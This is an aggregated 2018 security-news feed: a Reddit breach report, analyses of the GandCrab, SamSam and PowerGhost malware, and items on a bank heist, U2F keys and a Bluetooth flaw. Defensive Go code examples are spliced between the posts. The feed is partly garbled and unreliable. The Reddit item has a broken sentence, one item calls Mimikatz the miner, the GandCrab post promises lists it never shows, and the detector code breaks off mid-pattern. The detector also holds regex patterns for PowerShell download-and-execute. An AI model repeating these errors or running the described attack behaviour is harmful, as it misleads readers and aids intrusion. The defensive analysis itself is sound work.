A hacker is said to have struck many systems belonging to Reddit, forcing the American social aggregation and web content rating website to put millions of its users on alert. The attack was confirmed after top security experts found that many systems had been breached between June 14 and June 18. The hacker also gained access to user data including many email addresses, usernames and passwords. According to sources, the affected users are mostly individuals who joined the site up to 2007.

Stunned by the breach, Reddit is preparing emails to its users, both affected and unaffected, to make them aware of such incidents in future. The attacker is believed to have gained access to all emails the company sent to users, most of which were received in June 2018. The company only learned around June 20 that the criminal had access to the mechanism used to send those emails.

Users who are still active have been asked to change their usernames and passwords immediately to keep them safe. Through emails Reddit has asked its users to change their current passwords, saying that the new password should not be similar to the old one; otherwise they are still not safe from hackers, be it on Reddit or other sites. According to the company, users are free to use two-step authentication with Google or Authy, which would make it harder for criminals to gain access to the existing system.

In a recent post, Reddit made clear that hackers compromised the accounts of many of its employees in mid-June through its cloud and source code providers. The company further admitted that the cyber criminals managed to get through the SMS verification process, but the data have remained unchanged. “We learned that SMS-based authentication.

The subsequent investigation uncovered many crucial things relating to this incident. The extent of damage is substantial and requires the help of law enforcement agencies; such an agency has been probing the incident with the inputs it received from Reddit.

E Hacking News - Latest Hacker News and IT Security News

Blog | Avast EN: SamSam ransomware can shut your city down | Avast

SamSam ransomware was first spotted in the digital wild back in 2015. Since then, its purveyors have racked up approximately $6M in extorted ransom money, experts surmise, and its diabolical reign shows no sign of slowing. The ransomware continues to be improved upon to make it sneakier, with its newest version encrypting files late at night, hoping to infect the system when the user is away from the screen. Additionally, the recent SamSam attacks all seem strategic and deliberate, as opposed to automated outbreaks, making them some of the most feared and destructive cyberattacks active today.

Blog | Avast EN

Data Security Blog | Thales eSecurity: Three Reasons You Should Treat Applications as Machine Identities in Your Security Strategy

This article was originally featured as a guest post on Venafi’s blog. Thales eSecurity and Venafi are technology partners.

Three Reasons You Should Treat Applications as Machine Identities in Your Security Strategy

One of the biggest threats to machine identities today is the integrity of the software that runs within them, and that dictates their programmed function. Whereas many machines worked independently in the past, the availability of ubiquitous communications is making it possible for networks of machines – including sensors, cloud applications, and distributed controls – to work in concert. This change has significantly expanded the data available to machines and the number of distributed actions they can effect.

Protecting the identities of applications is one of three major challenges that must be addressed to ensure trust and facilitate the adoption of transformational technologies employing connected devices (machines) in the rapidly growing Internet of Things (IoT) and DevOps environments.

1 – We need to be able to trust the data that comes from applications

Because machines increasingly talk to each other and exchange important data that they collect, strong mutual authentication and trust between them is critical. This is the first challenge: strong authentication requires trusted identities. If one cannot trust the machines, there is no point in collecting the data they produce, running analytics on it, and executing decisions based on it.

2 – We need to be sure that data flows freely from application to application

The second challenge is the protection of the integrity and confidentiality of the data collected as it flows from machine to machine, including applications which execute decisions (often without human intervention) based on that data. Because machines collect sensitive and personal data, privacy and regulatory compliance must also be a concern.

3 – We need to constantly verify the integrity of the applications themselves

The third challenge, and the one I believe to be most concerning, is the threat to the integrity of the software. As machines (devices and applications) require regular updates as part of their lifecycle, the legitimacy and integrity of the downloaded code must be preserved to protect from potentially damaging malware and other attacks.

The reason this is such a critical issue is that the machine identity might remain intact, but its execution might become compromised. Think of this as a trusted soldier going rogue. The individual is still the same person, but they may shift their allegiance. If software upgrades are not properly signed to give them a verifiable identity, they can provide a conduit through which malware can be introduced to collect and re-direct sensitive data, compromise users’ privacy, and perform functions that are damaging to the enterprise.

Machine/device credentialing and code signing are fundamental aspects to consider when developing a comprehensive security strategy that addresses the increasing use of machines, and this is why code signing is so important. Enterprises embarking on digital transformation initiatives need to be cognizant of the potential threats to machine identities, including the identity of the software that machines run.

This is especially true in DevOps and other Fast IT environments. Because software is developed and deployed more quickly, attackers who want to assume the identity of a trusted enterprise are stealing the certificates that organizations use to sign their code. If an organization’s code-signing key or certificate is compromised, attackers can use it to authenticate malware so it can be distributed widely.

To address this challenge at scale, we need to offer applications the same protections that we provide for machines. Automated and secure cryptographic key orchestration is required to safeguard the identities of our applications.
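As an added example (not code from Thales or Venafi), here is the device-side check the third challenge calls for: an update is installed only if its manifest is signed by a trusted, non-revoked key and the payload hashes to the digest the manifest commits to. Ed25519 stands in for an X.509 code-signing certificate chain, and the manifest format, product name and payload are constructed for this example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Manifest describes one software update: what it is and the digest of the
// bytes the device is expected to install. Hypothetical format for this example.
type Manifest struct {
	Product string
	Version string
	SHA256  string // hex digest of the update payload
}

// canonical returns the byte string that is signed. Fields are length-prefixed
// so that no two different manifests serialize to the same bytes.
func (m Manifest) canonical() []byte {
	var out []byte
	for _, f := range []string{m.Product, m.Version, m.SHA256} {
		out = append(out, fmt.Sprintf("%d:%s;", len(f), f)...)
	}
	return out
}

// SignUpdate is run by the build pipeline: it hashes the payload, fills the
// manifest and signs the manifest with the vendor's code-signing key.
func SignUpdate(priv ed25519.PrivateKey, product, version string, payload []byte) (Manifest, []byte) {
	sum := sha256.Sum256(payload)
	m := Manifest{Product: product, Version: version, SHA256: hex.EncodeToString(sum[:])}
	return m, ed25519.Sign(priv, m.canonical())
}

var (
	ErrUntrustedKey = errors.New("signer key is not trusted")
	ErrRevokedKey   = errors.New("signer key has been revoked")
	ErrBadSignature = errors.New("manifest signature does not verify")
	ErrDigest       = errors.New("payload digest does not match manifest")
)

// Verifier is the device-side policy: which signing keys are trusted and which
// of those have since been revoked (for instance after a key compromise).
type Verifier struct {
	Trusted []ed25519.PublicKey
	Revoked []ed25519.PublicKey
}

func contains(keys []ed25519.PublicKey, k ed25519.PublicKey) bool {
	for _, t := range keys {
		if t.Equal(k) {
			return true
		}
	}
	return false
}

// VerifyUpdate is what the machine runs before installing anything: the key
// must be trusted and not revoked, the signature must cover the manifest, and
// the payload must hash to the digest the manifest commits to.
func (v Verifier) VerifyUpdate(signer ed25519.PublicKey, m Manifest, sig, payload []byte) error {
	if !contains(v.Trusted, signer) {
		return ErrUntrustedKey
	}
	if contains(v.Revoked, signer) {
		return ErrRevokedKey
	}
	if !ed25519.Verify(signer, m.canonical(), sig) {
		return ErrBadSignature
	}
	sum := sha256.Sum256(payload)
	if hex.EncodeToString(sum[:]) != m.SHA256 {
		return ErrDigest
	}
	return nil
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	v := Verifier{Trusted: []ed25519.PublicKey{pub}}
	payload := []byte("constructed firmware image v2.1") // constructed sample payload
	m, sig := SignUpdate(priv, "sensor-gw", "2.1", payload)

	fmt.Println("genuine update:", v.VerifyUpdate(pub, m, sig, payload))
	fmt.Println("tampered payload:", v.VerifyUpdate(pub, m, sig, []byte("not the signed bytes")))
	m2 := m
	m2.Version = "9.9"
	fmt.Println("altered manifest:", v.VerifyUpdate(pub, m2, sig, payload))
	// A stolen signing key produces signatures that verify like genuine ones;
	// the device can only reject them once the key is revoked.
	v.Revoked = append(v.Revoked, pub)
	fmt.Println("revoked key:", v.VerifyUpdate(pub, m, sig, payload))
}
```

The revocation list is what turns the article's key-compromise scenario from silent acceptance into a rejected update, which is why key orchestration has to include distributing revocations to the machines themselves.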

To learn more visit Thales Booth 1222 and Venafi Booth 144 at Black Hat USA 2018 in Las Vegas. Or follow me on Twitter @asenjojuan

The post Three Reasons You Should Treat Applications as Machine Identities in Your Security Strategy appeared first on Data Security Blog | Thales eSecurity.

Data Security Blog | Thales eSecurity

E Hacking News – Latest Hacker News and IT Security News: Digital Enemy of the Corporate Networks

Adding to the numerous malware families already in circulation, a new member named PowerGhost has joined the family lately. Like wildfire, this malware is swiftly finding its way into corporate networks, mostly infecting workstations and servers. Its purpose is the illegitimate mining of cryptocurrency and the operation of DDoS (Distributed Denial of Service) attacks for profit.

The PowerGhost miner has been encountered most often in Brazil, Colombia, Turkey, and India, where it has, unfortunately, successfully infected organizations' local area networks.

It is imperative for all corporate bodies to choose the best prevention software to counter DDoS attacks. The attackers use fileless malware techniques to maintain persistence and to circumvent anti-virus detection, and they exploit vulnerabilities using exploits such as 'EternalBlue'.

Infection Modes of PowerGhost malware

At the outset, the victims were infected by remote administration tools or by exploits, together with PowerShell scripts that launched the malware at once.

Basically, PowerGhost runs as an obfuscated PowerShell script that comprises a number of core modules: for instance, libraries for mining operations, the miner itself, and PE file injection for the EternalBlue exploit.

Some of them are:

  • msvcp120.dll and msvcr120.dll (Libraries)
  • Mimikatz (Miner)
  • PE injection and shellcode

The malware also tries to spread across the local network using 'EternalBlue' (MS17-010, CVE-2017-0144). Once on a new system, it uses 32- and 64-bit exploits for MS16-032, MS15-051, and CVE-2018-8120.

The scripts operate in several stages and can competently 'self-update'. A module keeps checking the C2 server; the moment it finds something new, it automatically updates itself, and ultimately the script dispatches the miner by loading a PE file through reflective PE injection.

According to one of the major anti-virus brands, with the assistance of Mimikatz the miner can obtain the user accounts and credentials present on the current machine. The miner can then use them in an attempt to proliferate across the local network by launching a copy of itself via WMI and downloading the miner body from the C2 server.

Research has also uncovered that one version of PowerGhost includes a tool for conducting DDoS attacks, which is used to make money alongside the profits from mining.


E Hacking News - Latest Hacker News and IT Security News

McAfee Blogs: GandCrab Ransomware Puts the Pinch on Victims

The GandCrab ransomware first appeared in January and has updated itself rapidly during its short life. It is the leading ransomware threat. The McAfee Advanced Threat Research team has reverse engineered Versions 4.0 through 4.2 of the malware.

The first versions (1.0 and 1.1) of this malware had a bug that left the keys in memory because the author did not correctly use the flags in a crypto function. One antimalware company released a free decryption tool, posted on

The hack was confirmed by the malware author in a Russian forum:

Figure 1. Confirmation by the author of the hack of GandCrab servers.

The text apologizes to partners for the hack and temporarily shuts down the program. It promises to release an improved version within a few days.

The second version of GandCrab quickly appeared and improved the malware server’s security against future counterattacks. The first versions of the ransomware had a list of file extensions to encrypt, but the second and later versions have replaced this list with an exclusion list. All files except those on the list were encrypted.

Old versions of the malware used RSA and AES to encrypt the files, and communicated with a control server to send the RSA keys locked with an RC4 algorithm.

The GandCrab author has moved quickly to improve the code and has added comments to mock the security community, law agencies, and the NoMoreRansom organization. The malware is not professionally developed and usually has bugs (even in Version 4.2), but the speed of changes is impressive and increases the difficulty of combating it.

Entry vector

GandCrab uses several entry vectors:

  • Remote desktop connections with weak security or bought in underground forums
  • Phishing emails with links or attachments
  • Trojanized legitimate programs containing the malware, or downloading and launching it
  • Exploit kits such as RigEK and others

The goal of GandCrab, as with other ransomware, is to encrypt all or many files on an infected system and insist on payment to unlock them. The developer requires payment in cryptocurrency, primarily DASH, because it is complex to track, or Bitcoin.

The malware is usually but not always packed. We have seen variants in .exe format (the primary form) along with DLLs. GandCrab is effectively ransomware as a service; its operators can choose which version they want.

Version 4.0

The most important change in Version 4.0 is in the algorithm used to encrypt files. Earlier versions used RSA and AES; the latest versions use Salsa20. The main reason is for speed. RSA is a powerful but slow algorithm. Salsa20 is quick and the implementation is small.

The ransomware checks the language of the system and will not drop the malicious payload if the infected machine operates in Russian or certain other former Soviet languages:

Figure 2. Checking the language of the infected system.

GandCrab encrypts any file that does not appear on the following file-extension exclusion list:

The ransomware does not encrypt files in these folders:

GandCrab leaves these files unencrypted:

The ransomware generates a pair of RSA keys before encrypting any file. The public key encrypts the Salsa20 key and random initialization vector (IV, or nonce) generated later for each file.

The encryption procedure generates a random Salsa20 key and a random IV for each file, encrypts the file with them, and encrypts this key and IV with a pair of RSA keys (with the public RSA key created at the beginning). The private key remains encrypted in the registry using another Salsa20 key and IV encrypted with an RSA public key embedded in the malware.

After encryption, the file key and IV are appended to the contents of the file in a new field of 8 bytes, increasing the original file size.

This method makes GandCrab very strong ransomware because without the private key to the embedded public key, it is not possible to decrypt the files. Without the new RSA private key, we cannot decrypt the Salsa20 key and IV that are appended to the file.

Finally, the ransomware deletes all shadow volumes on the infected machine and deletes itself.

Version 4.1

This version retains the Salsa20 algorithm, fixes some bugs, and adds a new function. This function, in a random procedure from a big list of domains, creates a final path and sends the encrypted information gathered from the infected machine. We do not know why the malware does this; the random procedure usually creates paths to remote sites that do not exist.

For example, one sample of this version has the following hardcoded list of encrypted domains. (This is only a small part of this list.)

The ransomware selects one domain from the list and creates a random path with one of these words:

Later it randomly chooses another word to add to the URL it creates:

Afterward it makes a file name, randomly choosing three or four combinations from the following list:

Finally the malware concatenates the filename with a randomly chosen extension:

At this point, the malware sends the encrypted information using POST to the newly generated URL for all domains in the embedded list, repeating the process of generating a path and name for each domain.

Another important change in this version is the attempt to obfuscate the calls to functions such as VirtualAlloc and VirtualFree.

Figure 3. New functions to obfuscate the code.

Version 4.1.2

This version has appeared with some variants. Two security companies revealed a vaccine to prevent infections by previous versions. The vaccine involved making a special file in a folder with a special name before the ransomware infects the system. If this file exists, the ransomware finishes without dropping the payload.

The file gets its name from the serial number of the Windows logical disk volume. The malware performs a simple calculation on this value and creates the file in the %appdata% or %program files% folder (depending on the OS) with the extension .lock.

Figure 4. Creating the special file.

The GandCrab author reacted quickly, changing the operation to make this value unique and use the Salsa20 algorithm with an embedded key and IV with text referring to these companies. The text and the value calculated were used to make the filename; the extension remained .lock.

One of the security companies responded by making a free tool to make this file available for all users, but within hours the author released another Version 4.1.2 with the text changed. The malware no longer creates any file, instead making a mutex object with this special name. The mutex remains and keeps the .lock extension in the name.

Figure 5. Creating a special mutex instead of a special lock file.

The vaccine does not work with the second Version 4.1.2 and Version 4.2, but it does work with previous versions.

Version 4.2

This version has code to detect virtual machines and stop running the ransomware within them.

It checks the number of remote units, the size of the ransomware running compared with certain sizes, installs a VectoredExceptionHandler, and checks for VMware virtual machines using the old trick of the virtual port in a little encrypted shellcode:

Figure 6. Detecting VMware.

The malware calculates the free space of the main Windows installation logic unit and finally calculates a value.

If this value is correct for the ransomware, it runs normally. If the value is less than 0x1E, it waits one hour to start the normal process. (It blocks automatic systems that do not have “sleep” prepared.) If the value is greater than 0x1E, the ransomware finishes its execution.

Figure 7. Checking for virtual machines and choosing a path.


GandCrab is the leading ransomware threat for any person or enterprise. The author uses many ways to install it—including exploit kits, phishing mails, Trojans, and fake programs. The developer actively updates and improves the code to make analysis more difficult and to detect virtual machines. The code is not professionally written and continues to suffer from bugs, yet the product is well promoted in underground forums and has increased in value.

McAfee detects this threat as Ran-GandCrab4 in Versions 4.0 and later. Previous ones are also detected.

Indicators of compromise


This sample uses the following MITRE ATT&CK techniques:

  • File deletion
  • System information discovery
  • Execution through API
  • Execution through WMIC
  • Application process discovery: to detect antimalware and security products as well as normal programs
  • Query registry: to get information about keys that the malware needs to make or read
  • Modify registry
  • File and directory discovery: to search for files to encrypt
  • Encrypt files
  • Process discovery: enumerating all processes on the endpoint to kill some special ones
  • Create files
  • Elevation of privileges





The post GandCrab Ransomware Puts the Pinch on Victims appeared first on McAfee Blogs.

McAfee Blogs

Blog | Avast EN: The Secret’s Out: Reports of the privacy of private browsing have been greatly exaggerated

Sure, surfing the web in “incognito” or “private” mode might seem more secure than doing it with a totally unsecured browser—the phrases imply an air of security—but recent research and an overwhelming amount of anecdotal evidence from security experts indicates that so-called private browsing isn’t nearly as private as it’s cracked up to be. In fact, it’s not really private at all: routers, firewalls, proxy servers, RAM chips or the Domain Name System (DNS) cache all could have a record of your browsing history.

Blog | Avast EN

CRN: Deliver Uncompromising Protection With The FortiGate 7000 Series

To be effective in today’s evolving threat landscape, your security solution needs to reliably control high volumes of network and cloud traffic. To be effective in large enterprises it needs to be simple to manage, easily scalable and future-proof. Discover how Fortinet’s FortiGate chassis-based next-generation firewalls deliver uncompromising protection at the edge, and in the core.


SecuriTeam Blogs: SSD Advisory – LINE Corporation URI Handlers Remote Commands Execution

Vulnerabilities Summary: LINE for Windows, provided by LINE Corporation, specifies the path from which a DLL is read when the software is launched. A user clicking on a specially crafted link can trigger this vulnerability, causing the application to insecurely load an arbitrary DLL, which can lead to arbitrary code execution. Vendor Response: “We released version 5.8.0 … Continue reading SSD Advisory – LINE Corporation URI Handlers Remote Commands Execution

SecuriTeam Blogs

SolarWinds MSP Blog: MSP Growth Strategies…What to Do When Referrals Stop

Most managed service provider (MSP) businesses were founded on a need and a reputation. A friend or an associate needed a service and someone said, “Hey I worked with this guy that’s a genius with networks and computers. Let’s give him a call and see if he can help us out.” A relationship was formed and a new business was born. After that, word-of-mouth and referrals added a few more clients, and before long, a business became a reality.


SolarWinds MSP Blog

Blog | Avast EN: Build-your-own banking trojan, ransomware on the high seas, and SIM card chaos | Avast

Source code to Exobot banking trojan leaked

“This has happened in the past, and it poses a risk as we saw in the case of the infamous Mirai botnet,” says Avast Security Evangelist Luis Corrons, speaking to the news that the source code to a potent bank trojan known as Exobot has been released into the wild of the dark web for anyone who cares to use it for their own ill will. The publicly-shared Mirai source code gave malware architects the blueprints to a powerful botnet, upon which they expanded. “Many malware writers used it to create their own customized version of the bot. We can expect the same here,” adds Luis.

Blog | Avast EN

E Hacking News – Latest Hacker News and IT Security News: A regional Virginia bank, the National Bank of Blacksburg, following a fruitful …

A regional Virginia bank, the National Bank of Blacksburg, has lost $2.4 million in a digital heist affecting the STAR ATM and debit network, following a successful phishing attack that compromised the organization's internal networks.

According to an April 2018 earnings statement from National Bankshares, the bank's parent company, National Bank's computer systems suffered two intrusions, one in May 2016 and one in January 2017.

In both cases, the intruders were able to compromise an internal workstation through a phishing attempt and a weaponized Microsoft Word document. From there, the attackers installed malware and pivoted to a machine on the network that had access to the bank's interface with the STAR network.

The hackers made withdrawals at several ATMs, suggesting a highly organized effort. National Bank hired Foregenix to examine the 2016 incident and Verizon to handle the forensics for the 2017 breach, according to the lawsuit. According to the reports, both firms traced the activity back to IP addresses located in Russia.

Leroy Terrelonge, director of intelligence and operations at Flashpoint, in an interview said that,
 “Actors who target banks are primarily financially motivated, they want a large return on their investment in gaining access to the bank and performing reconnaissance. When attackers are able to establish a presence on a network through deployment of malware or using stolen credentials, they can often remain in stealth for a period of weeks or months, and they use that time to observe the activity of normal users at the bank and perform reconnaissance of the systems, processes and procedures used. ”  

The bank is now suing its insurance carrier for not covering the full extent of the damage. In the lawsuit, it explained that it had two kinds of coverage for cyber incidents: the Computer and Electronic Crime Rider, which covers a wide swath of malicious activity and losses of up to $8 million per hack; and the Debit Card Rider, which has a $500,000 cap per incident.

With respect to the bank's internal cybersecurity efforts in the wake of the hacks, National Bankshares president and CEO Brad Denardo issued a brief media statement addressing the matter:

“I would like to reassure our shareholders and our customers that we take cyber security very seriously. We have taken the necessary steps to avoid cyber intrusions of the sort we experienced in 2016 and 2017, and we continually work to monitor and prevent future threats.”

E Hacking News - Latest Hacker News and IT Security News

E Hacking News – Latest Hacker News and IT Security News: Physical USB security keys in Google

Physical USB security keys have become a central defense for Google. The keys have replaced one-time codes for the company's roughly 85,000 employees, and since the switch attackers, who keep probing for new ways onto employees' devices, have not managed to compromise any employee's work account.

A security key is a form of two-factor authentication (2FA). In the usual 2FA flow, a user logs into a website with a password and then enters an additional one-time code, typically delivered to a phone; Google used to deliver those codes to its employees through an in-house app. According to a person associated with the company, Google has required the physical keys for all work-related account access for about the last year and a half, and an employee may have to authenticate with the key again for individual applications, depending on how sensitive the application is.

The keys implement a version of multi-factor authentication known as Universal 2nd Factor (U2F), an open authentication standard: the user plugs in the USB device to log in, and once the key has been registered with a site, the key takes the place of the one-time code. Facebook, Dropbox and GitHub, among others, also support U2F logins.

U2F does need browser support, which Chrome, Firefox and Opera provide; Microsoft is reported to be adding U2F support to Edge in a later update. Yubico, a maker of physical security keys, sells a basic U2F key for about $20.
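Why a U2F key stops the phishing the article alludes to is easiest to see in code. The Go program below is an added example, not code from Google, Yubico or the article: it models a key that holds one P-256 key pair per origin it was registered at, a browser that passes the current page origin as the application ID, and a site that verifies the signature and the counter. The origin https://accounts.example.com and the look-alike https://accounts-example.com are assumed for illustration; the signed message layout (app-ID hash, user-presence byte, counter, client-data hash) follows the U2F raw message format, while key handles, the client-data JSON and the USB transport are left out.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// SecurityKey models the USB token: one key pair per application ID (the origin
// it was registered at) plus a signature counter. A site at any other origin has
// no key pair to sign with, which is what makes U2F logins phishing-resistant.
type SecurityKey struct {
	keys    map[string]*ecdsa.PrivateKey
	counter uint32
}

func NewSecurityKey() *SecurityKey {
	return &SecurityKey{keys: make(map[string]*ecdsa.PrivateKey)}
}

// Register generates a P-256 key pair bound to appID and returns the public key
// for the site to store with the user's account.
func (k *SecurityKey) Register(appID string) (*ecdsa.PublicKey, error) {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	k.keys[appID] = priv
	return &priv.PublicKey, nil
}

// Assertion is the key's answer to an authentication request.
type Assertion struct {
	Counter uint32
	Sig     []byte // ASN.1 DER-encoded ECDSA signature
}

// authMessage is what a U2F key signs:
// SHA-256(appID) || user-presence byte || 4-byte counter || SHA-256(client data).
// The client data binds the challenge to the origin the browser saw.
func authMessage(appID string, counter uint32, challenge []byte) []byte {
	appHash := sha256.Sum256([]byte(appID))
	clientHash := sha256.Sum256(append([]byte(appID+"\x00"), challenge...))
	var ctr [4]byte
	binary.BigEndian.PutUint32(ctr[:], counter)
	msg := make([]byte, 0, 69)
	msg = append(msg, appHash[:]...)
	msg = append(msg, 0x01) // user presence (touch) confirmed
	msg = append(msg, ctr[:]...)
	return append(msg, clientHash[:]...)
}

// Authenticate is called by the browser with the page origin as appID. The key
// refuses if it holds no key pair for that origin, so a look-alike domain gets
// nothing it could relay to the real site.
func (k *SecurityKey) Authenticate(appID string, challenge []byte) (*Assertion, error) {
	priv, ok := k.keys[appID]
	if !ok {
		return nil, errors.New("u2f: no key registered for origin " + appID)
	}
	k.counter++
	digest := sha256.Sum256(authMessage(appID, k.counter, challenge))
	sig, err := ecdsa.SignASN1(rand.Reader, priv, digest[:])
	if err != nil {
		return nil, err
	}
	return &Assertion{Counter: k.counter, Sig: sig}, nil
}

// RelyingParty is the website: its own app ID, the user's public key and the
// last counter value it accepted.
type RelyingParty struct {
	AppID       string
	PubKey      *ecdsa.PublicKey
	LastCounter uint32
}

// Verify checks the signature over the site's own app ID and the challenge it
// issued, and requires the counter to move forward (a replayed assertion or a
// cloned key fails here).
func (rp *RelyingParty) Verify(challenge []byte, a *Assertion) error {
	if a.Counter <= rp.LastCounter {
		return errors.New("u2f: counter did not increase (replay or cloned key)")
	}
	digest := sha256.Sum256(authMessage(rp.AppID, a.Counter, challenge))
	if !ecdsa.VerifyASN1(rp.PubKey, digest[:], a.Sig) {
		return errors.New("u2f: bad signature")
	}
	rp.LastCounter = a.Counter
	return nil
}

// Login runs one authentication: the site issues a fresh challenge, the browser
// hands it to the key together with the origin it is on, the site verifies.
func Login(rp *RelyingParty, key *SecurityKey, browserOrigin string) error {
	challenge := make([]byte, 32)
	if _, err := rand.Read(challenge); err != nil {
		return err
	}
	a, err := key.Authenticate(browserOrigin, challenge)
	if err != nil {
		return err
	}
	return rp.Verify(challenge, a)
}

func main() {
	key := NewSecurityKey()
	rp := &RelyingParty{AppID: "https://accounts.example.com"} // assumed origin
	rp.PubKey, _ = key.Register(rp.AppID)
	fmt.Println("real site:    ", Login(rp, key, rp.AppID))
	fmt.Println("phishing site:", Login(rp, key, "https://accounts-example.com"))
}
```

The point to notice is that the password is still typed, and could still be phished; what the attacker cannot obtain is a signature over the real site's app ID, because the browser names the origin it is actually on and the key has nothing registered for it.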

E Hacking News - Latest Hacker News and IT Security News

Blog | Avast EN: Bluetooth flaw allows man-in-the-middle attacks | Avast

The IoT world is abuzz over a newly disclosed Bluetooth flaw that opens the door to man-in-the-middle attacks, which are exactly what they sound like: attacks in which a third party wedges itself between two of your devices and can read, and potentially alter, the data they exchange. Such attacks succeed when the link is weakly protected or not protected at all, and that is precisely the problem with CVE-2018-5383, a cryptographic flaw that affects two Bluetooth pairing features, Secure Simple Pairing and LE Secure Connections.
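The weakness behind CVE-2018-5383 is that a device may use the ECDH public key it receives during pairing without checking that the point actually lies on the curve. A man in the middle can keep the x coordinate and replace y (the published attack sets it to 0), which turns the exchange into one on a different curve where the shared secret has only a couple of possible values. The Go program below is an added example, not Avast's or any Bluetooth stack's code: it shows the legacy acceptance path beside the validation the fixed stacks perform, on P-256, the curve both pairing features use. The honest key pair is generated locally to stand in for the remote device.

```go
package main

import (
	"crypto/elliptic"
	"crypto/rand"
	"errors"
	"fmt"
	"math/big"
)

// curve is P-256, used by Secure Simple Pairing and LE Secure Connections.
var curve = elliptic.P256()

// PeerPublicKey is the ECDH public key received over the air during pairing,
// as affine coordinates.
type PeerPublicKey struct{ X, Y *big.Int }

// acceptPeerKeyLegacy mirrors the behaviour that made CVE-2018-5383 possible:
// the point is taken as delivered and fed straight into the key agreement.
func acceptPeerKeyLegacy(pk PeerPublicKey) error {
	if pk.X == nil || pk.Y == nil {
		return errors.New("missing coordinate")
	}
	return nil
}

// acceptPeerKey is the validation a fixed stack performs before any scalar
// multiplication: both coordinates in [0, p) and the point on the curve. P-256
// has cofactor 1, so every on-curve affine point also has the full group order
// and no separate small-subgroup check is needed.
func acceptPeerKey(pk PeerPublicKey) error {
	if pk.X == nil || pk.Y == nil {
		return errors.New("missing coordinate")
	}
	p := curve.Params().P
	for _, c := range []*big.Int{pk.X, pk.Y} {
		if c.Sign() < 0 || c.Cmp(p) >= 0 {
			return errors.New("coordinate outside the field")
		}
	}
	if !curve.IsOnCurve(pk.X, pk.Y) {
		return errors.New("point is not on P-256: possible invalid-curve attack")
	}
	return nil
}

// tamperY is the man in the middle's substitution from the published attack:
// keep X, set Y to 0. (X, 0) has order 2 on the curve y^2 = x^3 - 3x + b' whose
// b' fits it, so every scalar multiple is either (X, 0) or the point at
// infinity, depending only on whether the victim's private key is odd or even.
func tamperY(pk PeerPublicKey) PeerPublicKey {
	return PeerPublicKey{X: pk.X, Y: big.NewInt(0)}
}

// genPeerKey simulates the honest remote device generating its ECDH key pair.
func genPeerKey() (PeerPublicKey, error) {
	_, x, y, err := elliptic.GenerateKey(curve, rand.Reader)
	return PeerPublicKey{X: x, Y: y}, err
}

func main() {
	honest, _ := genPeerKey()
	evil := tamperY(honest)
	fmt.Println("legacy, honest key:  ", acceptPeerKeyLegacy(honest))
	fmt.Println("legacy, tampered key:", acceptPeerKeyLegacy(evil))
	fmt.Println("fixed,  honest key:  ", acceptPeerKey(honest))
	fmt.Println("fixed,  tampered key:", acceptPeerKey(evil))
}
```

The range check matters as much as the on-curve check: a coordinate equal to or larger than p is a second way of smuggling in a point the curve arithmetic was never meant to see.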

Blog | Avast EN

The Ethical Hacker Network: Book Review: Social Engineering: The Science of Human Hacking

In his new book, “Social Engineering: The Science of Human Hacking, 2nd Edition,” Chris Hadnagy really hits the mark by providing a great overview of social engineering techniques, explaining how and why they work, and giving the reader plenty of real-world examples to back it all up. The target audience is humans, as Chris explains. If you are human, I […]

The Ethical Hacker Network

Securelist – Kaspersky Lab’s cyberthreat research and reports: A mining multitool

Recently, an interesting miner implementation appeared on Kaspersky Lab’s radar. The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers. This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation. The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system. It appears the growing popularity and rates of cryptocurrencies have convinced the bad guys of the need to invest in new mining techniques – as our data demonstrates, miners are gradually replacing ransomware Trojans.

Technical description and propagation method

PowerGhost is an obfuscated PowerShell script that contains the core code and the following add-on modules: the actual miner, mimikatz, the libraries msvcp120.dll and msvcr120.dll required for the miner’s operation, a module for reflective PE injection and a shellcode for the EternalBlue exploit.

Fragment of the obfuscated script

The add-on modules encoded in base64

The malicious program uses a number of fileless techniques to remain inconspicuous to the user and undetected by antivirus technologies. The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive.

What the script does after that can be broken down into several stages:

  • Automatic self-update. PowerGhost checks whether a new version is available on the C&C. If there is, it downloads the new version and launches it instead of itself.
  • Propagation. With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C. PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (MS17-010, CVE-2017-0144).
  • Escalation of privileges. Because the miner spreads via mimikatz and WMI, it may end up on a new machine with only user rights. It then attempts to escalate its privileges with the 32- or 64-bit exploits for MS16-032, MS15-051 and CVE-2018-8120.
  • Establishing a foothold in the system. PowerGhost saves all the modules as properties of a WMI class. The miner’s body is saved in the form of a one-line PowerShell script in a WMI subscription that activates every 90 minutes.
  • Payload. Lastly, the script launches the miner by loading a PE file via reflective PE injection.
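The infection chain above (download-and-execute in memory, base64-embedded modules, WMI subscription persistence, lateral movement via WMI, reflective PE injection) leaves traces in PowerShell script-block logging (Event ID 4104) even though nothing is written to disk. The Go program below is an added example, not Kaspersky Lab's code and not PowerGhost itself: a small detector that runs the patterns a hunter would derive from the stages described over constructed sample script blocks. The sample blocks, the C2 host c2.example.invalid and the WQL filter are made up for the demonstration; the Win32 API names used as the reflective-loading indicator are a common heuristic, not something the article attributes to PowerGhost.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding pairs one behaviour from the infection chain with the pattern that
// flags it in PowerShell script-block text.
type Finding struct {
	Name    string
	Pattern *regexp.Regexp
}

var findings = []Finding{
	// Stage 0: fetch the body and run it in memory; nothing touches disk.
	{"in-memory download-and-execute", regexp.MustCompile(
		`(?i)\b(iex|invoke-expression)\b[\s\S]*?(downloadstring|downloaddata|invoke-webrequest|net\.webclient)` +
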